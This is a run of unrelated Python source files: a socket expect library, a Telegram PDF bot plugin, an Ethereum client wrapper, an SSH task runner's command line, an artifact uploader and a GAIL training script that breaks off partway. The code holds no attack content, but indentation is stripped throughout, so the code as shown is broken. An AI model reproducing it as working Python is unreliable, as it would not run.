nexpect.py
Authors: Josh Christman and Nathan Hart
Version: 1.0.6
Date: 8 December 2013
Changelog (v1.0.6):
- Created new method: n.expectnl() which will expect a newline and not include the newline in the result it returns. I'm adding this because of
how often I do n.expect('\\n', incl=False)
Changelog (v1.0.5):
- Added a global recvsize variable which makes a permanent change to the number of bytes received per test of the regexes in the expect methods.
- Rearranged some code to more efficiently use global variables recvsize and timeout
Changelog (v1.0.4):
- Fixed a bug in the expect method that was keeping the incl flag from working
- Made the sendline and send methods always cast the data to a str before doing anything
- This makes it possible to do sendline(1) and have it send the number 1, and to concatenate without having to cast to a string on the user side
'''
import threading,sys,socket,re,time
def spawn(sock, timeout=30, withSSL=False):
return nexpect(sock, timeout=timeout, withSSL=withSSL)
'''
The class nexpect is a socket expect module written using basic python modules. It should work on any
system with Python 2.7
'''
class nexpect():
'''
The constructor has one mandatory parameter:
sock - This can be either a tuple with an address and port to connect to, or a socket object.
Ex: s = nexpect(('www.example.com',1234))
s = nexpect(('123.123.123.123',1234))
sock = socket.socket()
sock.connect(('www.example.com',1234))
s = nexpect(sock)
Optional parameters are:
timeout - Sets the class timeout variable used as the timeout for the expect method
'''
def __init__(self, sock, timeout=30, recvsize=1, withSSL=False):
self.timeout = timeout
self.recvsize = recvsize
self.before = ''
self.matched = ''
if type(sock) == type(()):
self.socket = socket.socket()
if withSSL:
import ssl
self.socket = ssl.wrap_socket(self.socket)
self.socket.connect(sock)
elif type(sock) == type(socket.socket()):
self.socket = sock
else:
raise TypeError
'''
This method does nothing but call the send method of the socket and pass the data to the socket
'''
def send(self, data=''):
self.socket.sendall(str(data))
'''
This method appends a delimeter to the data and then sends it to the socket
Optional parameters are:
delimeter - Defaults to a '\n' but can be set to anything
'''
def sendline(self, data='', delimeter='\n'):
self.socket.sendall(str(data) + delimeter)
'''
A convenience method to access the underlying socket's recv mechanism.
'''
def recv(self, num_bytes):
return self.socket.recv(num_bytes)
'''
This function takes a single regex in string form or a list/tuple of string regexes and receives data
on the socket until it matches the regex. If a single regex is passed in, only the data received is
returned from the function. If a list/tuple of regexes is passed in, the function returns a tuple of
the data and the index of the regex it matched. If the call times out, the data received so far
is included in the TimeoutException message so you can see why nothing matched.
Optional parameters are:
recvsize - the size of the data to receive each time through the loop. It defaults to 1 but can
be slow this way. Increase this if you know that the data being sent to you will be fairly regular.
timeout - a local override of the class timeout variable. Use this when you want a
different timeout than the usual one.
incl - a variable that you can set to false if you don't want the regex you're matching to be returned
as part of the data. Example: n.expect('>',incl=False) on "prompt >" would return "prompt "
'''
def expect(self, regex, recvsize=-1, timeout=-1, incl=True):
if recvsize == -1:
recvsize = self.recvsize
if timeout == -1:
timeout = self.timeout
isList = False
if type(regex) == type(()) or type(regex) == type([]):
isList = True
data = ''
t0 = time.time()
while True:
t1 = time.time()
elapsedTime = t1-t0 # Get the elapsed time since before the receive loop started
if elapsedTime > timeout: # Test the timeout
raise TimeoutException('Data received before timeout: "' + data + '"')
else:
# If it hasn't timed out, set the socket's timeout so that it won't block forever
self.socket.settimeout(timeout - elapsedTime)
# Now receive the data
try:
data += self.socket.recv(recvsize)
except:
# I know - catching an exception to raise another one means I'm evil. Sorry!
raise TimeoutException('Data received before timeout: "' + data + '"')
# Data was received - time to check the data to see if it matches the regexes
if isList: # Check if a list or tuple of regexes was passed in
for counter,reg in enumerate(regex): # Enumerate the regexes for testing
match = re.search(reg, data)
if match:
if not incl:
data = data.replace(match.group(0), "") # Will replace the match with a blank string
self.before = data
self.matched = reg
return data, counter # Return the data and the index of the regex found
else:
match = re.search(regex, data)
if match: # If only a single regex was passed in, return the data if it is found
if not incl:
data = data.replace(match.group(0),"") # Will replace the match with a blank string
self.before = data
self.matched = regex
return data
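# Usage sketch (illustrative): a single regex returns just the received data,
#   banner = n.expect('>', incl=False)          # the '>' match is stripped from the result
# while a list of regexes also returns the index of the one that matched:
#   data, idx = n.expect(['login:', 'Password:'])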
'''
The expectnl method just calls self.expect('\n',incl=False)
'''
def expectnl(self):
return self.expect('\n',incl=False)
'''
The interact method turns this into a netcat-like session: it prints whatever it receives
over the socket and sends everything you type.
Optional parameters are:
delimiter - Specify a delimiter to be appended to all data sent over the socket. Defaults to a '\n'
'''
def interact(self, delimiter="\n"):
try:
r = self.recieverPrinter(self.socket)
r.daemon = True # ensure the thread quits when the main thread dies
r.start() # start the receiver thread
# enter the send loop
while True:
command = raw_input()
if command == "exit":
# die in a pretty manner
r.kill()
self.socket.sendall(command+delimiter)
return
self.socket.sendall(command+delimiter)
except KeyboardInterrupt:
r.kill()
return
except:
pass
def settimeout(self, timeout):
self.timeout = timeout
def start(self, connection_data):
self.socket = socket.socket()
self.socket.connect(connection_data)
def shutdown(self):
self.socket.close()
self.socket = None
class recieverPrinter(threading.Thread):
def __init__(self, socket):
super(nexpect.recieverPrinter, self).__init__()
self.socket = socket
self.socket.settimeout(0.5)
self.stop = False
def run(self):
while not self.stop:
try:
sys.stdout.write(self.socket.recv(1024))
sys.stdout.flush()
except:
pass
def kill(self):
self.stop = True
class TimeoutException(Exception):
def __init__(self, message=''):
Exception.__init__(self, message)
|
py | b40360e4519f54f928db2203bcbd23cb8e0facf9 | # fileName : plugins/toKnown.py
# copyright ©️ 2021 nabilanavab
from pyrogram.types import Message
from plugins.fileSize import get_size_format as gSF
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
#--------------->
#--------> LOCAL VARIABLES
#------------------->
pdfInfoMsg = """`What shall I do with this file?`
File Name : `{}`
File Size : `{}`
`Number of Pages: {}`✌️"""
#--------------->
#--------> EDIT CHECKPDF MESSAGE (IF PDF & NOT ENCRYPTED)
#------------------->
# convert unknown to known page number msgs
async def toKnown(callbackQuery, number_of_pages):
try:
fileName = callbackQuery.message.reply_to_message.document.file_name
fileSize = callbackQuery.message.reply_to_message.document.file_size
await callbackQuery.edit_message_text(
pdfInfoMsg.format(
fileName, await gSF(fileSize), number_of_pages
),
reply_markup = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
"⭐ get page No & info ⭐",
callback_data=f"KpdfInfo|{number_of_pages}"
)
],
[
InlineKeyboardButton(
"To Images 🖼️",
callback_data=f"KtoImage|{number_of_pages}"
),
InlineKeyboardButton(
"To Text ✏️",
callback_data=f"KtoText|{number_of_pages}"
)
],
[
InlineKeyboardButton(
"Encrypt 🔐",
callback_data=f"Kencrypt|{number_of_pages}"
),
InlineKeyboardButton(
"Decrypt 🔓",
callback_data=f"notEncrypted"
)
],
[
InlineKeyboardButton(
"Compress 🗜️",
callback_data=f"Kcompress"
),
InlineKeyboardButton(
"Rotate 🤸",
callback_data=f"Krotate|{number_of_pages}"
)
],
[
InlineKeyboardButton(
"Split ✂️",
callback_data=f"Ksplit|{number_of_pages}"
),
InlineKeyboardButton(
"Merge 🧬",
callback_data="merge"
)
],
[
InlineKeyboardButton(
"Stamp ™️",
callback_data=f"Kstamp|{number_of_pages}"
),
InlineKeyboardButton(
"Rename ✏️",
callback_data="rename"
)
]
]
)
)
except Exception as e:
print(f"plugins/toKnown: {e}")
# Telegram: @nabilanavab
|
py | b40360ffcf36a2a20607cc2e8adba1bf90e8f261 | #!/usr/bin/python3
import operator
import sys
import json
import os
sys.path.append(os.getcwd())
sys.path.append("{}".format(os.getcwd()))
sys.path.append("..")
import log
import log.logger
import traceback
import datetime
import sqlalchemy
import stmanage
import requests
import random
import comm
import comm.error
import comm.result
import comm.values
from comm import version
from comm.result import result, parse_except
from comm.error import error
from comm.functions import (
is_mnemonic,
output_args
)
from ethopt.ethproxy import (
ethproxy as clientproxy,
walletproxy,
VLSMPROOF_MAIN_NAME,
VLSMPROOF_DATAS_NAME,
VLSMPROOF_STATE_NAME
)
from enum import Enum
from baseobject import baseobject
import redis
import web3
from web3 import Web3
from ethopt.ethproxy import (
VLSMPROOF_MAIN_NAME,
contract_codes,
)
from comm.values import (
ETH_ADDRESS_LEN
)
#module name
name="eclient"
VLSMPROOF_MAIN_ADDRESS = contract_codes[VLSMPROOF_MAIN_NAME]["address"]
ETH_ADDRESS_LEN = comm.values.ETH_ADDRESS_LEN
class ethwallet(baseobject):
def __init__(self, name, wallet, chain="ethereum", main_address = None):
assert wallet is not None, "wallet is None"
baseobject.__init__(self, name)
self.__wallet = None
self.set_vlsmproof_main_address(main_address)
if wallet is not None:
ret = self.__load_wallet(wallet, chain)
if ret.state != error.SUCCEED:
raise Exception(f"load wallet[{wallet}] failed.")
def __del__(self):
pass
def set_vlsmproof_main_address(self, main_address):
if main_address:
VLSMPROOF_MAIN_ADDRESS = main_address
def __load_wallet(self, wallet, chain="ethereum"):
try:
self.__wallet_name = wallet
if os.path.isfile(wallet):
self.__wallet = walletproxy.load(wallet)
ret = result(error.SUCCEED, "", "")
elif is_mnemonic(wallet):
self.__wallet_name = None
self.__wallet = walletproxy.loads(wallet)
ret = result(error.SUCCEED, "", "")
else:
ret = result(error.SUCCEED, "not found wallet file", "")
raise Exception(f"not found {self.name()} wallet file({wallet})")
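# note: the assignment below is unreachable because the raise above leaves this branch;
# the exception is caught by parse_except in the enclosing try/except.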
self.__wallet = walletproxy.new()
except Exception as e:
ret = parse_except(e)
return ret
def save(self):
try:
if self.__wallet is not None and self.__wallet_name:
self.__wallet.write_recovery(self.__wallet_name)
ret = result(error.SUCCEED)
except Exception as e:
ret = parse_except(e)
return ret
def dump_wallet(self):
try:
if self.__wallet is not None:
self.save()
self.__wallet = None
pass
ret = result(error.SUCCEED)
except Exception as e:
ret = parse_except(e)
return ret
@classmethod
def is_valid_address(self, address):
try:
ret = result(error.SUCCEED, datas = walletproxy.is_valid_address(address))
except Exception as e:
ret = parse_except(e)
return ret
def new_account(self):
try:
account = self.__wallet.new_account();
self.save()
ret = result(error.SUCCEED, "", account)
except Exception as e:
ret = parse_except(e)
return ret
def get_account_count(self):
return len(self.__wallet.accounts)
def is_main_contract_address(self, address):
return address == VLSMPROOF_MAIN_ADDRESS
def get_account(self, addressorid):
try:
if isinstance(addressorid, str) and addressorid == VLSMPROOF_MAIN_ADDRESS:
return result(error.SUCCEED, "", VLSMPROOF_MAIN_ADDRESS)
account = self.__wallet.get_account_by_address_or_refid(addressorid)
if account is None:
ret = result(error.ARG_INVALID)
else:
ret = result(error.SUCCEED, "", account)
except Exception as e:
ret = parse_except(e)
return ret
def find_account_by_address_hex(self, address):
return self.__wallet.find_account_by_address_hex(address)
def has_account_by_address(self, address):
try:
_, account = self.find_account_by_address_hex(address)
if account is None:
ret = result(error.SUCCEED, "", False)
else:
ret = result(error.SUCCEED, "", True)
except Exception as e:
ret = parse_except(e)
return ret
def has_account(self):
try:
self.__wallet.get_account_by_address_or_refid(0)
ret = result(error.SUCCEED, "", True)
except ValueError as e: #account count is 0, so not found account
ret = result(error.SUCCEED, "", False)
except Exception as e:
ret = parse_except(e)
return ret
def split_full_address(self, address, auth_key_prefix = None):
try:
ret = result(error.SUCCEED, datas = (None, address))
except Exception as e:
ret = parse_except(e)
return ret
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
class ethclient(baseobject):
def __init__(self, name, nodes, chain = "ethereum", usd_chain = True):
baseobject.__init__(self, name, chain)
self.__client = None
self.__node = None
if nodes is not None:
ret = self.conn_node(name, nodes, chain, usd_chain = usd_chain)
if ret.state != error.SUCCEED:
raise Exception(f"connect {chain} node failed.")
def __del__(self):
self.disconn_node()
def clientname(self):
return self.__client.clientname()
def load_vlsmproof(self, address):
self.__client.load_vlsmproof(address)
def load_contract(self, name):
self.__client.load_contract(name)
def set_contract_map_account(self, account):
self._sender_map_account = account
def map_account(self, account):
if isinstance(account, str) and account == VLSMPROOF_MAIN_ADDRESS:
return self._sender_map_account
return account
def conn_node(self, name, nodes, chain = "ethereum", usd_chain = False):
try:
if nodes is None or len(nodes) == 0:
return result(error.ARG_INVALID, repr(nodes), "")
for node in nodes:
try:
if self.work() == False:
return result(error.FAILED, f"connect {chain} work stop")
self._logger.debug("try connect node({}) : host = {} port = {} chain_id = {}".format( \
node.get("name", ""), node.get("host"), node.get("port"), node.get("chain_id", 42)))
client = clientproxy(host=node.get("host"), \
port=node.get("port"), \
usd_chain = usd_chain
)
#if not client.is_connected():
# self._logger.info(f"connect {chain} node failed({e}). test next...")
# continue
self._logger.debug(f"connect {chain} node succeed.")
except Exception as e:
parse_except(e)
self._logger.info(f"connect {chain} node failed({e}). test next...")
else:
self.__client = client
self.__node = node
return result(error.SUCCEED, "", "")
            #could not connect to any node
ret = result(error.FAILED, f"connect {chain} node failed.", "")
except Exception as e:
ret = parse_except(e)
return ret
def stop(self):
self.work_stop()
def disconn_node(self):
try:
ret = result(error.SUCCEED)
except Exception as e:
ret = parse_except(e)
return ret
def get_syncing_state(self):
try:
ret = result(error.SUCCEED, datas = self.__client.syncing_state())
except Exception as e:
ret = parse_except(e)
return ret
def get_balance(self, account_address, token_id, module_address = None):
try:
balance = self.__client.get_balance(account_address, token_id)
ret = result(error.SUCCEED, "", balance)
except Exception as e:
ret = parse_except(e)
return ret
def get_balances(self, account_address):
try:
balance = self.__client.get_balances(account_address)
ret = result(error.SUCCEED, "", balance)
except Exception as e:
ret = parse_except(e)
return ret
def address_is_exists(self, address):
try:
state = self.__client.account_is_exists(address)
ret = result(error.SUCCEED, "", state)
except Exception as e:
ret = parse_except(e)
return ret
def get_address_sequence(self, address):
try:
num = self.__client.get_sequence_number(address)
ret = result(error.SUCCEED, "", num)
except Exception as e:
ret = parse_except(e)
return ret
def get_transaction_version(self, address, sequence):
try:
num = self.__client.get_account_transaction_version(address, sequence)
ret = result(error.SUCCEED, "", num)
except Exception as e:
ret = parse_except(e)
return ret
def get_address_version(self, address, sequence):
try:
ret = self.get_transaction_version(address, sequence)
if ret.state != error.SUCCEED:
return ret
ret = result(error.SUCCEED, "", ret.datas)
except Exception as e:
ret = parse_except(e)
return ret
def get_address_latest_version(self, address):
try:
ver = self.__client.get_account_latest_version(address)
ret = result(error.SUCCEED, "", ver)
except Exception as e:
ret = parse_except(e)
return ret
def get_latest_transaction_version(self):
try:
datas = self.__client.get_latest_version()
ret = result(error.SUCCEED, "", datas - 1)
except Exception as e:
ret = parse_except(e)
return ret
def get_transactions(self, start_version, limit = 1, fetch_event=True):
try:
datas = self.__client.get_transactions(start_version, limit, fetch_event)
ret = result(error.SUCCEED, "", datas)
except Exception as e:
ret = parse_except(e)
return ret
def get_transaction(self, version, fetch_event=True):
try:
datas = self.__client.get_transactions(version, 1 , fetch_event)
ret = result(error.SUCCEED, "", datas[0] if datas is not None else None)
except Exception as e:
ret = parse_except(e)
return ret
def get_rawtransaction(self, txhash):
try:
datas = self.__client.get_rawtransaction(txhash)
ret = result(error.SUCCEED, "", datas)
except Exception as e:
ret = parse_except(e)
return ret
#the same to btc/violas get_decimals
def get_decimals(self, token_id):
return self.__client.get_decimals(token_id)
def create_data_for_end(self, flag, opttype, tranid, *args, **kwargs):
return {"type": "end", "flag": flag, "opttype":opttype, \
"version":kwargs.get("version", -1), "out_amount_real": kwargs.get("out_amount_real", 0)}
def create_data_for_stop(self, flag, opttype, tranid, *args, **kwargs):
return {"type": "stop", "flag": flag, "opttype":opttype, \
"version":kwargs.get("version", -1)}
def create_data_for_mark(self, flag, dtype, id, version, *args, **kwargs):
return {"type": "mark", "flag": flag, "version":version }
@output_args
def approve(self, account, to_address, amount, token_id, **kwargs):
try:
datas = self.__client.approve(account, to_address, amount, token_id, **kwargs)
ret = result(error.SUCCEED, datas = datas)
except Exception as e:
ret = parse_except(e)
return ret
@output_args
def allowance(self, from_address, to_address, token_id, **kwargs):
try:
datas = self.__client.allowance(from_address, to_address, token_id, **kwargs)
ret = result(error.SUCCEED, datas = datas)
except Exception as e:
ret = parse_except(e)
return ret
@output_args
def send_proof(self, account, token_id, datas, **kwargs):
try:
datas = self.__client.send_proof(account, token_id, datas, **kwargs)
ret = result(error.SUCCEED, datas = datas)
except Exception as e:
ret = parse_except(e)
return ret
def send_coin_erc20(self, account, toaddress, amount, token_id, *args, **kwargs):
return self.send_coin(account, toaddress, amount, token_id, data= {"type":"mark", "version": None},*args, **kwargs)
def send_coin(self, account, toaddress, amount, token_id, data, *args, **kwargs):
'''change state
'''
try:
sender_account = self.map_account(account)
if data["type"] in ("end", "stop"):
datas = self.__client.update_proof_state(sender_account, data["version"], data["type"])
elif data["type"] == "mark":
datas = self.__client.send_token(sender_account, toaddress, amount, token_id)
else:
                raise Exception(f"type {data['type']} is invalid.")
ret = result(error.SUCCEED if len(datas) > 0 else error.FAILED, "", datas = datas)
self._logger.debug(f"result: {ret.datas}")
except Exception as e:
ret = parse_except(e)
return ret
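    # Hedged usage sketch of the end/stop/mark data protocol above (addresses, amounts
    # and token ids are illustrative, not real):
    #   data = client.create_data_for_mark(flag="eth", dtype="mark", id=0, version=12)
    #   client.send_coin(account, "0x1111111111111111111111111111111111111111", 1000, "usdt", data)
    #   done = client.create_data_for_end(flag="eth", opttype="b2e", tranid="t-0", version=12)
    #   client.send_coin(account, "0x1111111111111111111111111111111111111111", 0, "usdt", done)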
def get_token_list(self):
try:
ret = result(error.SUCCEED, datas = self.__client.token_name_list())
except Exception as e:
ret = parse_except(e)
return ret
def get_proof_contract_address(self, name):
try:
datas = None
if name == "main":
datas = self.__client.token_address(VLSMPROOF_MAIN_NAME)
elif name == "datas":
datas = self.__client.token_address(VLSMPROOF_DATAS_NAME)
elif name == "state":
datas = self.__client.token_address(VLSMPROOF_STATE_NAME)
else:
raise ValueError(f"name({name}) is invalid.")
ret = result(error.SUCCEED, datas = datas)
except Exception as e:
ret = parse_except(e)
return ret
def get_chain_id(self):
try:
ret = result(error.SUCCEED, datas = self.__client.get_chain_id())
except Exception as e:
ret = parse_except(e)
return ret
def get_token_min_amount(self, token_id):
try:
ret = result(error.SUCCEED, datas = self.__client.get_token_min_amount(token_id))
except Exception as e:
ret = parse_except(e)
return ret
def get_token_max_amount(self, token_id):
try:
ret = result(error.SUCCEED, datas = self.__client.get_token_max_amount(token_id))
except Exception as e:
ret = parse_except(e)
return ret
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
return self.__client
def main():
pass
if __name__ == "__main__":
main()
|
py | b403610d3ad6dfb77e30afae83addf375798ab47 |
import os, imp, getpass, sys, traceback, re
from pprint import pprint
from twisted.python.filepath import FilePath
from twisted.internet.task import react
from twisted.internet import reactor
from twisted.internet.endpoints import UNIXClientEndpoint
from twisted.conch.ssh.keys import EncryptedKeyError, Key
from twisted.conch.client.knownhosts import KnownHostsFile
from twisted.python import log as logger
import click
from structlog import PrintLogger
log = PrintLogger()
from plait.app.console import ConsoleApp
from plait.app.terminal import TerminalApp
from plait.runner import PlaitRunner
from plait.task import NoSuchTaskError, task
from plait.errors import *
from plait.utils import parse_task_calls, Bag
def findPlaitfile(path=os.getcwd()):
files = os.listdir(path)
parent = os.path.dirname(path)
if 'plaitfile.py' in files:
fullpath = os.path.join(path, 'plaitfile.py')
return os.path.abspath(fullpath)
elif parent != path:
return findPlaitfile(parent)
raise StartupError("Couldn't find plaitfile.py")
def importPlaitfile(filename):
try:
err = None
return imp.load_source('plaitfile', filename)
except Exception as e:
e = StartupError("Couldn't import plaitfile")
e.tb = traceback.format_exc()
raise e
def gatherTasks(tasks, pf_module):
parsed_tasks = parse_task_calls(tasks)
for task_name, args, kwargs in parsed_tasks:
task_func = getattr(pf_module, task_name, None)
if not task_func:
error = "Task `{}` does not exist in pf_module: {}"
error = error.format(task_name, pf_module.__file__)
raise NoSuchTaskError(error)
task_func = task(task_func)
yield task_name, task_func, args, kwargs
def getTasks(tasks, plaitfile, **kwargs):
if not tasks:
raise StartupError("Must specify at least one task to execute.")
pf_module = importPlaitfile(plaitfile or findPlaitfile())
return list(gatherTasks(tasks, pf_module))
def setupLogging(logging, **kwargs):
if logging:
logger.startLogging(sys.stdout, setStdout=1)
def readKey(path):
try:
return Key.fromFile(path)
except EncryptedKeyError:
passphrase = getpass.getpass("%r keyphrase: " % (path,))
return Key.fromFile(path, passphrase=passphrase)
def getKeys(identity, **kwargs):
key_path = os.path.expanduser(identity)
if os.path.exists(key_path):
return [readKey(key_path)]
def getKnownHosts(knownhosts, **kwargs):
known_hosts_path = FilePath(os.path.expanduser(knownhosts))
if known_hosts_path.exists():
return KnownHostsFile.fromPath(known_hosts_path)
def getAgentEndpoint(agent, **kwargs):
if "SSH_AUTH_SOCK" in os.environ and agent:
auth_socket = os.environ["SSH_AUTH_SOCK"]
return UNIXClientEndpoint(reactor, auth_socket)
def getHosts(host, hostfile, **kwargs):
hosts = list(host)
if hostfile:
with open(hostfile, 'r') as fobj:
hosts += tuple(l.strip() for l in fobj.readlines())
if not sys.stdin.isatty():
hosts += tuple(l.strip() for l in sys.stdin.readlines())
if not len(hosts):
raise StartupError("Must specify at least one host.")
return hosts
def getErrorFilter(errors, hide_errors, **kwargs):
if errors and hide_errors:
msg = "`-e` and `-E` cannot be used simultaneously."
raise StartupError(msg)
elif errors:
# only show errors
return True
elif hide_errors:
# don't show errors
return False
else:
# show all sessions
return None
def getGrepFilter(grep, hide_grep, **kwargs):
if grep and hide_grep:
msg = "`-g` and `-G` cannot be used simultaneously."
raise StartupError(msg)
elif grep:
return lambda x: (re.search(grep, x) is not None)
elif hide_grep:
return lambda x: (re.search(hide_grep, x) is None)
else:
return lambda x: (re.search(".*", x) is not None)
def getQuietFilter(quiet, **kwargs):
return quiet
def getQuietReport(quiet_report, **kwargs):
return quiet_report
def getShowReport(report, **kwargs):
return report
def getAllTasks(all_tasks, **kwargs):
return all_tasks
def getConnectSettings(scale, retries, timeout, **kwargs):
return Bag(scale=scale,
retries=retries,
timeout=timeout,
keys = getKeys(**kwargs),
known_hosts = getKnownHosts(**kwargs),
agent_endpoint = getAgentEndpoint(**kwargs))
@click.command()
@click.argument('tasks', nargs=-1)
@click.option('--host', '-h',
multiple=True, metavar='*',
help="[$USER@]hostname[:22]")
@click.option('--hostfile', '-H',
default=False, metavar='',
help="Read hosts from a line delimited file")
@click.option('--plaitfile', '-p',
default=None, metavar='',
help="Read tasks from specified file")
@click.option('--interactive', '-I',
is_flag=True,
help="Display results graphically")
@click.option('--all-tasks', '-A',
is_flag=True, metavar='',
help="Tasks with no output result in a warning")
@click.option('--report', '-R',
is_flag=True, metavar='',
help="Print summary report")
@click.option('--quiet', '-q',
is_flag=True, metavar='',
help="Hide hosts that produce no result")
@click.option('--quiet-report', '-Q',
is_flag=True, metavar='',
help="Only print summary report (implies -R)")
@click.option('--errors', '-e',
is_flag=True, metavar='',
help="Only show sessions with an error")
@click.option('--hide-errors', '-E',
is_flag=True, metavar='',
help="Hide sessions with an error")
@click.option('--grep', '-g',
default=None, metavar='',
help="Only display sessions matching a pattern")
@click.option('--hide-grep', '-G',
default=None, metavar='',
help="Hide sessions matching a pattern")
@click.option('--scale', '-s',
default=0, metavar='',
help="Number of hosts to execute in parallel")
@click.option('--retries', '-r',
default=1, metavar='',
help="Times to retry SSH connection")
@click.option('--timeout', '-t',
default=10, metavar='',
help="Seconds to wait for SSH")
@click.option('--identity', '-i',
default="~/.ssh/id_rsa", metavar="*",
help="Public key to use")
@click.option('--agent', '-a',
is_flag=True,
help="Whether to use system ssh-agent for auth")
@click.option('--knownhosts', '-k',
default="~/.ssh/known_hosts", metavar='',
help="File with authorized hosts")
@click.option('--logging', '-l',
is_flag=True,
help="Show twisted logging")
def run(tasks, interactive, **kwargs):
"""
* can be supplied multiple times
"""
setupLogging(**kwargs)
tasks = getTasks(tasks, **kwargs)
hosts = getHosts(**kwargs)
connect_settings = getConnectSettings(**kwargs)
all_tasks = getAllTasks(**kwargs)
runner = PlaitRunner(hosts, tasks, connect_settings, all_tasks)
error_filter = getErrorFilter(**kwargs)
grep_filter = getGrepFilter(**kwargs)
quiet_filter = getQuietFilter(**kwargs)
show_report = getShowReport(**kwargs)
quiet_report = getQuietReport(**kwargs)
if interactive:
app = ConsoleApp(title="plait 1.0")
else:
app = TerminalApp(error_filter, grep_filter, quiet_filter,
report=show_report, report_only=quiet_report)
app.run(runner)
def main():
try:
run()
except StartupError as e:
        log.error(" * " + str(e))
if hasattr(e, 'tb'):
log.error(e.tb)
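# Hedged CLI sketch (assumes this module is installed as a `plait` console script, a
# plaitfile.py defining an `uptime` task is discoverable via findPlaitfile, and the
# task-call syntax follows parse_task_calls):
#   plait -h deploy@web01 -h deploy@web02:2222 uptime
#   plait -H hosts.txt -R 'restart("nginx")'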
|
py | b403611abb61bfb53fa049c5a12055745b767b5a | from datetime import datetime
from typing import Any
import magic # type: ignore
import requests
from requests import Response
mime: Any = magic.Magic(mime=True)
file_access_url = "https://api.treebeard.io"
def log(message: str):
print(f'{datetime.now().strftime("%H:%M:%S")}: {message}')
def upload_artifact(filename: str, upload_path: str):
log(f"Saving {filename} to {upload_path}")
content_type: str = mime.from_file(filename)
with open(filename, "rb") as data:
resp: Response = requests.get(
f"{file_access_url}/get_upload_url/{upload_path}",
params={"content_type": content_type},
)
signed_url: str = resp.text
requests.put(signed_url, data, headers={"Content-Type": content_type})
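# Hedged example (paths are made up; upload_path is the object key the artifact is stored under):
#   upload_artifact("outputs/report.html", "runs/123/report.html")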
|
py | b403616bb015bdd5a7eb6bfcde632323168103f7 | #!/usr/bin/python3
import argparse
import gym
import numpy as np
import tensorflow as tf
from network_models.policy_net import Model_Policy_net, Policy_net, Model_net
from network_models.discriminator import Discriminator, ModelDiscriminator
from algo.ppo import PPOTrain, ModelTrain
import pdb
import math
from time import sleep
def argparser():
parser = argparse.ArgumentParser()
parser.add_argument('--logdir', help='log directory', default='log/train/gail_model3')
parser.add_argument('--savedir', help='save directory', default='trained_models/gail_model')
parser.add_argument('--gamma', default=0)
parser.add_argument('--iteration', default=int(1e6), type=int)
parser.add_argument('--resdir', help='expert actor policy', default='trained_models/ppo/expert/model.ckpt')
return parser.parse_args()
def check_done(state, policy_steps):
x, x_dot, theta, theta_dot = state
theta_threshold_radians = 12 * 2 * math.pi / 360
x_threshold = 2.4
done = x < -x_threshold \
or x > x_threshold \
or theta < -theta_threshold_radians \
or theta > theta_threshold_radians
if policy_steps > 200:
done = True
return done
def check_done_easy(policy_steps):
return policy_steps > 200
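# Quick sanity checks of the termination helpers above (values picked by hand):
#   check_done([0.0, 0.0, 0.0, 0.0], 10)   -> False (inside both thresholds)
#   check_done([3.0, 0.0, 0.0, 0.0], 10)   -> True  (|x| > 2.4)
#   check_done_easy(201)                   -> True  (episode capped at 200 steps)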
if __name__ == '__main__':
args = argparser()
env = gym.make('CartPole-v0')
env.seed(0)
ob_space = env.observation_space
obs_dim = 4
act_dim = 1
num_epochs = 1
batches_per_epoch = 10
batch = 64
rl = True
sl = False
render = True
render_freq = 500
d_freq = 1
use_dummy_data = False
use_random = False
# For expert data it seems that gamma = 0, (rl: (32, 5)), stop=50 works well
stochastic_policy = True
stochastic_model = True
disc_test = False
# Policy is now the dynamics model
Model = Model_Policy_net('model_policy', env, obs_dim+act_dim, obs_dim)
Old_Model = Model_Policy_net('old_model_policy', env, obs_dim+act_dim, obs_dim)
PPO = ModelTrain(Model, Old_Model, obs_dim+act_dim, obs_dim, gamma=args.gamma)
D = ModelDiscriminator(env, obs_dim+act_dim, obs_dim)
# Load the actor
Policy = Policy_net('policy', env)
restore_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='policy')
restorer = tf.train.Saver(var_list=restore_vars)
saver = tf.train.Saver()
# Process expert data for discriminator
if use_dummy_data:
# Dummy expert data (REMOVE WHEN DONE DEBUGGING)
print("Using dummy data")
load_exp_o = np.tile(np.array([[0., 0., 1., 0.]]), [10000, 1])
load_exp_a = np.ones((10000, act_dim))
exp_o = np.concatenate([load_exp_o, load_exp_a], axis=1)
exp_a = load_exp_o
reset_idx = np.zeros((len(exp_o)))
elif use_random:
print("Using random policy data")
load_exp_o = np.genfromtxt('rtrajectory/observations.csv')
load_exp_a = np.expand_dims(np.genfromtxt('rtrajectory/actions.csv', dtype=np.int32), axis=1)
reset_idx = np.genfromtxt('rtrajectory/reset_idx.csv', dtype=np.float32)
exp_o = np.concatenate([load_exp_o[:-1]] + [load_exp_a[:-1]]*act_dim, axis=1)
exp_a = load_exp_o[1:]
# Take out transitions at the end of episodes
mask = reset_idx[1:]
delete_idx = np.nonzero(np.logical_not(mask))[0]
exp_o = np.delete(exp_o, delete_idx, 0)
exp_a = np.delete(exp_a, delete_idx, 0)
else:
print("Using expert data")
load_exp_o = np.genfromtxt('trajectory/observations.csv')
load_exp_a = np.expand_dims(np.genfromtxt('trajectory/actions.csv', dtype=np.int32), axis=1)
reset_idx = np.genfromtxt('trajectory/reset_idx.csv', dtype=np.float32)
exp_o = np.concatenate([load_exp_o[:-1]] + [load_exp_a[:-1]]*act_dim, axis=1)
exp_a = load_exp_o[1:]
# Take out transitions at the end of episodes
mask = reset_idx[1:]
delete_idx = np.nonzero(np.logical_not(mask))[0]
exp_o = np.delete(exp_o, delete_idx, 0)
exp_a = np.delete(exp_a, delete_idx, 0)
# Process expert data for supervised learning
given = np.concatenate([load_exp_o[:-1], load_exp_a[:-1]], axis=1)
tv = load_exp_o[1:]
mask = reset_idx[1:]
tv = np.concatenate([tv, mask[:, np.newaxis]], axis=1)
num_demo = len(load_exp_o) - 1
print("Number of Demonstrations: {}".format(num_demo))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
restorer.restore(sess, args.resdir)
writer = tf.summary.FileWriter(args.logdir, sess.graph)
success_num = 0
for iteration in range(args.iteration):
# Supervised Learning
if sl:
epoch_loss = []
for i in range(batches_per_epoch):
batch_idx = np.random.randint(num_demo, size=batch)
batch_given = given[batch_idx]
batch_tv = tv[batch_idx]
_, loss = Model.train_sl(batch_given, batch_tv)
